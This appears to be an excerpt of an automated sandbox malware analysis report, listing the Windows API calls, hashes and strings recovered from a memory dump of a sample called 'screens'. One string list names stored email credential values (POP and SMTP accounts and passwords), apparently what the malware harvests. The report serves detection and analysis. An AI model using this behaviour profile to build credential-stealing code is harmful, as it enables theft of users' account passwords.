                                                            • Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                                                            • Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95
                                                            APIs
                                                            • GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_screens.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressProc
                                                            • String ID: s1@
                                                            • API String ID: 190572456-427247929
                                                            • Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                                                            • Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
                                                            • Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                                                            • Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4
                                                            APIs
                                                              • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                              • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                                            • RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                                                            • RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_screens.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$AllocateOpenProcessQueryValue
                                                            • String ID:
                                                            • API String ID: 1425999871-0
                                                            • Opcode ID: 3e4d8bbd79b3f452f46c2a76b22aa97fad6e7d266f80de6aae28761da4a6239d
                                                            • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                                                            • Opcode Fuzzy Hash: 3e4d8bbd79b3f452f46c2a76b22aa97fad6e7d266f80de6aae28761da4a6239d
                                                            • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9
                                                            APIs
                                                            • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_screens.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CheckMembershipToken
                                                            • String ID:
                                                            • API String ID: 1351025785-0
                                                            • Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                                                            • Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
                                                            • Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                                                            • Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764
                                                            APIs
                                                            • CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_screens.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateDirectory
                                                            • String ID:
                                                            • API String ID: 4241100979-0
                                                            • Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                                                            • Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
                                                            • Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                                                            • Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4
                                                            APIs
                                                            • GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_screens.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: InfoNativeSystem
                                                            • String ID:
                                                            • API String ID: 1721193555-0
                                                            • Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                                                            • Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
                                                            • Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                                                            • Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5
                                                            APIs
                                                            • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_screens.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: send
                                                            • String ID:
                                                            • API String ID: 2809346765-0
                                                            • Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                                                            • Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
                                                            • Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                                                            • Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98
                                                            APIs
                                                            • MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_screens.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FileMove
                                                            • String ID:
                                                            • API String ID: 3562171763-0
                                                            • Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                                                            • Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
                                                            • Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                                                            • Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664
                                                            APIs
                                                            • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_screens.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Startup
                                                            • String ID:
                                                            • API String ID: 724789610-0
                                                            • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                                            • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                                                            • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                                            • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2
                                                            APIs
                                                            • SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_screens.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                                                            • Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
                                                            • Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                                                            • Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8
                                                            APIs
                                                            • RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_screens.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Open
                                                            • String ID:
                                                            • API String ID: 71445658-0
                                                            • Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                                                            • Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
                                                            • Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                                                            • Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658
                                                            APIs
                                                            • DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_screens.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: DeleteFile
                                                            • String ID:
                                                            • API String ID: 4033686569-0
                                                            • Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                                                            • Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
                                                            • Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                                                            • Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8
                                                            APIs
                                                            • LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_screens.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: LibraryLoad
                                                            • String ID:
                                                            • API String ID: 1029625771-0
                                                            • Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                                                            • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                                                            • Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                                                            • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5
                                                            APIs
                                                            • FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_screens.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseFind
                                                            • String ID:
                                                            • API String ID: 1863332320-0
                                                            • Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                                                            • Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
                                                            • Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                                                            • Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4
                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_screens.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                                                            • Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
                                                            • Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                                                            • Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4
                                                            APIs
                                                            • RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_screens.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Close
                                                            • String ID:
                                                            • API String ID: 3535843008-0
                                                            • Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                                                            • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                                                            • Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                                                            • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                                                            APIs
                                                            • PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_screens.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExistsFilePath
                                                            • String ID:
                                                            • API String ID: 1174141254-0
                                                            • Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                                                            • Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
                                                            • Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                                                            • Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199
                                                            APIs
                                                            • closesocket.WS2_32(00404EB0), ref: 00404DEB
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_screens.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: closesocket
                                                            • String ID:
                                                            • API String ID: 2781271927-0
                                                            • Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                                                            • Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
                                                            • Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                                                            • Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8
                                                            APIs
                                                            • VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_screens.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FreeVirtual
                                                            • String ID:
                                                            • API String ID: 1263568516-0
                                                            • Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                                                            • Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
                                                            • Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                                                            • Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8
                                                            APIs
                                                            • CloseHandle.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_screens.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseHandle
                                                            • String ID:
                                                            • API String ID: 2962429428-0
                                                            • Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                                                            • Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
                                                            • Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                                                            • Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4
                                                            APIs
                                                            • Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_screens.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID:
                                                            • API String ID: 3472027048-0
                                                            • Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                                                            • Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
                                                            • Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                                                            • Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9
                                                            APIs
                                                            • StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_screens.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                                                            • Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
                                                            • Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                                                            • Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559
                                                            APIs
                                                            • StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_screens.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                                                            • Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
                                                            • Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                                                            • Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659
                                                            APIs
                                                            • CoInitialize.OLE32(00000000), ref: 0040438F
                                                            • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                                                            • VariantInit.OLEAUT32(?), ref: 004043C4
                                                            • SysAllocString.OLEAUT32(?), ref: 004043CD
                                                            • VariantInit.OLEAUT32(?), ref: 00404414
                                                            • SysAllocString.OLEAUT32(?), ref: 00404419
                                                            • VariantInit.OLEAUT32(?), ref: 00404431
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_screens.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: InitVariant$AllocString$CreateInitializeInstance
                                                            • String ID:
                                                            • API String ID: 1312198159-0
                                                            • Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                                                            • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                                                            • Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                                                            • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_screens.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                                                            • API String ID: 0-2111798378
                                                            • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                                            • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                                                            • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                                            • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_screens.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                                            • Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
                                                            • Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                                            • Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64